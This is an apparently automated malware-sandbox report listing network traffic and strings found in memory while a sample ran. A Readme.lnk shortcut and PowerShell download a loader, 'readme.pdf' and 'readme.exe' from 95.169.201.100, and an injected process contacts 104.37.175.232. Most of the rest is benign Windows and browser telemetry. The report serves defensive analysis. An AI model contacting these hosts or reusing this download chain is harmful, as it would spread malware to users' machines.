                      Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /api/secure/116887b2ac34a05784dca6f2cac7cc03 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 95.169.201.100:18956Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /uploads/team-1/loader.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 95.169.201.100:18960Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /uploads/team-1/readme.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 95.169.201.100:18960Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /uploads/team-1/readme.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 95.169.201.100:18960
                      Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                      Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                      Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
                      Source: 123123213123123321132.exe, 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmp, 123123213123123321132.exe, 00000013.00000002.2155411238.0000000002520000.00000004.00001000.00020000.00000000.sdmp, 123123213123123321132.exe, 00000013.00000000.1893797179.000000000053D000.00000002.00000001.01000000.00000014.sdmp, 123123213123123321132.exe, 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://%shttp://a.SharedObject.BadPersistencependingSharedObject.UriMismatch
                      Source: 123123213123123321132.exe, 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmp, 123123213123123321132.exe, 00000013.00000002.2155411238.0000000002520000.00000004.00001000.00020000.00000000.sdmp, 123123213123123321132.exe, 00000013.00000000.1893797179.000000000053D000.00000002.00000001.01000000.00000014.sdmp, 123123213123123321132.exe, 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://.macromedia.com/support/flashplayer/sys/https://SettingsSubdomainmms.cfgdefaultAuthorLocalSec
                      Source: powershell.exe, 00000005.00000002.1908641173.000002110415F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.1
                      Source: powershell.exe, 00000005.00000002.2045540014.000002111B8E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.20
                      Source: powershell.exe, 00000002.00000002.1732302738.0000023180C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.169.201.100:18956
                      Source: powershell.exe, 00000002.00000002.1732302738.0000023180C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1732302738.0000023180231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03
                      Source: powershell.exe, 00000002.00000002.1769233310.00000231FA440000.00000004.00000020.00020000.00000000.sdmp, Readme.lnk.download.lnkString found in binary or memory: http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)
                      Source: powershell.exe, 00000002.00000002.1768442721.00000231F8B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03).WSH;.MSCPROCc
                      Source: powershell.exe, 00000002.00000002.1762775028.00000231F8A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)Winsta0
                      Source: powershell.exe, 00000002.00000002.1732302738.0000023180001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)p
                      Source: powershell.exe, 00000002.00000002.1762775028.00000231F8A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)pOweRsHeLL
                      Source: powershell.exe, 00000002.00000002.1732302738.0000023181616000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.0000021103B33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.00000211039C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.169.201.100:18960
                      Source: powershell.exe, 00000002.00000002.1732302738.0000023181604000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.169.201.100:18960/uploads/team-1/loader.txt
                      Source: powershell.exe, 00000005.00000002.1897367350.0000021101891000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.201.100:18960/uploads/team-1/readme.exe
                      Source: powershell.exe, 00000005.00000002.1897367350.0000021101891000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.201.100:18960/uploads/team-1/readme.pdf
                      Source: powershell.exe, 00000002.00000002.1732302738.0000023181616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.169.201.100:189602b
                      Source: svchost.exe, 00000007.00000002.2905592428.0000016AA02CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 00000007.00000003.1803361498.0000016AA5818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                      Source: svchost.exe, 00000007.00000003.1803361498.0000016AA5818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                      Source: svchost.exe, 00000007.00000003.1803361498.0000016AA5818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                      Source: svchost.exe, 00000007.00000003.1803361498.0000016AA5818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                      Source: svchost.exe, 00000007.00000003.1803361498.0000016AA5818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                      Source: svchost.exe, 00000007.00000003.1803361498.0000016AA5818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                      Source: svchost.exe, 00000007.00000003.1803361498.0000016AA584D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                      Source: svchost.exe, 00000007.00000003.1803361498.0000016AA5907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: powershell.exe, 00000005.00000002.1908641173.0000021104167000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                      Source: powershell.exe, 00000002.00000002.1732302738.00000231819D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1758275532.0000023190073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1758275532.00000231901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2029156339.0000021113813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000005.00000002.1908641173.00000211039C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000005.00000002.1908641173.0000021103B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000002.00000002.1732302738.0000023180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.00000211037A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000005.00000002.1908641173.0000021103B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000005.00000002.2051453477.000002111BCE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwMSFT_NetOffloadGlobalSetting.cdxmll0l
                      Source: powershell.exe, 00000005.00000002.1908641173.00000211039C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: 123123213123123321132.exe, 123123213123123321132.exe, 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmp, 123123213123123321132.exe, 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.macromedia.com
                      Source: 123123213123123321132.exe, 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmp, 123123213123123321132.exe, 00000013.00000002.2155411238.0000000002520000.00000004.00001000.00020000.00000000.sdmp, 123123213123123321132.exe, 00000013.00000000.1893797179.000000000053D000.00000002.00000001.01000000.00000014.sdmp, 123123213123123321132.exe, 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.macromedia.comhttps://www.macromedia.com/support/flashplayer/sys/&amp
                      Source: fontdrvhost.exe, fontdrvhost.exe, 0000001F.00000002.2515294505.00000289EBE80000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihus
                      Source: fontdrvhost.exe, 0000001B.00000002.2233502749.0000000005954000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2230274989.0000000005955000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000001F.00000002.2515294505.00000289EBE80000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihuskernelbasentdllkernel32GetProcessMitig
                      Source: fontdrvhost.exe, 0000001B.00000002.2230889696.0000000002FFC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihusx
                      Source: powershell.exe, 00000002.00000002.1732302738.0000023180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.00000211037A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000005.00000002.1908641173.0000021103B33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.0000021104B6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.000002110484E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.000002110568C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.0000021105444000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2045540014.000002111B8E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.00000211056B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: powershell.exe, 00000005.00000002.1908641173.0000021104B6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.000002110568C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.00000211056B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                      Source: msedge.exe, 00000006.00000002.1888183068.00000180CF266000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comse
                      Source: msedge.exe, 00000006.00000002.1896022575.0000572000194000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                      Source: msedge.exe, 00000006.00000002.1896022575.0000572000194000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                      Source: 7eed1d6f-da3d-4fd0-8dd1-50c6bc664727.tmp.10.drString found in binary or memory: https://clients2.google.com
                      Source: msedge.exe, 00000006.00000002.1892213765.000057200000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                      Source: 7eed1d6f-da3d-4fd0-8dd1-50c6bc664727.tmp.10.drString found in binary or memory: https://clients2.googleusercontent.com
                      Source: fontdrvhost.exe, 0000001B.00000003.2162579775.0000000003A0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-query
                      Source: fontdrvhost.exe, 0000001B.00000003.2162579775.0000000003A0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi
                      Source: powershell.exe, 00000005.00000002.2029156339.0000021113813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000005.00000002.2029156339.0000021113813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000005.00000002.2029156339.0000021113813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: 000003.log.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
                      Source: 000003.log.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
                      Source: svchost.exe, 00000007.00000003.1803361498.0000016AA58C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                      Source: svchost.exe, 00000007.00000003.1803361498.0000016AA5872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                      Source: svchost.exe, 00000007.00000003.1803361498.0000016AA58C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                      Source: svchost.exe, 00000007.00000003.1803361498.0000016AA58A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1803361498.0000016AA5907000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1803361498.0000016AA58E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                      Source: svchost.exe, 00000007.00000003.1803361498.0000016AA58C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                      Source: powershell.exe, 00000005.00000002.1908641173.00000211039C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000002.00000002.1732302738.0000023180C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.0000021104B6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.0000021104167000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: msedge.exe, 00000006.00000002.1897165408.00005720002E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                      Source: msedge.exe, 00000006.00000002.1897165408.00005720002E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                      Source: msedge.exe, 00000006.00000002.1897165408.00005720002E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                      Source: powershell.exe, 00000002.00000002.1732302738.00000231819D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1758275532.0000023190073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1758275532.00000231901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2029156339.0000021113813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: msedge.exe, 00000006.00000002.1897165408.00005720002E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                      Source: svchost.exe, 00000007.00000003.1803361498.0000016AA58C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                      Source: svchost.exe, 00000007.00000003.1803361498.0000016AA5872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                      Source: msedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                      Source: msedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                      Source: msedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                      Source: msedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                      Source: msedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                      Source: msedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                      Source: msedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                      Source: msedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                      Source: msedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                      Source: msedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                      Source: msedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                      Source: msedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                      Source: msedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                      Source: msedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                      Source: 7eed1d6f-da3d-4fd0-8dd1-50c6bc664727.tmp.10.drString found in binary or memory: https://www.googleapis.com
                      Source: 123123213123123321132.exe, 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmp, 123123213123123321132.exe, 00000013.00000002.2155411238.0000000002520000.00000004.00001000.00020000.00000000.sdmp, 123123213123123321132.exe, 00000013.00000000.1893797179.000000000053D000.00000002.00000001.01000000.00000014.sdmp, 123123213123123321132.exe, 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.macromedia.com/bin/flashdownload.cgi
                      Source: 123123213123123321132.exe, 123123213123123321132.exe, 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.macromedia.com/support/flashplayer/sys/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
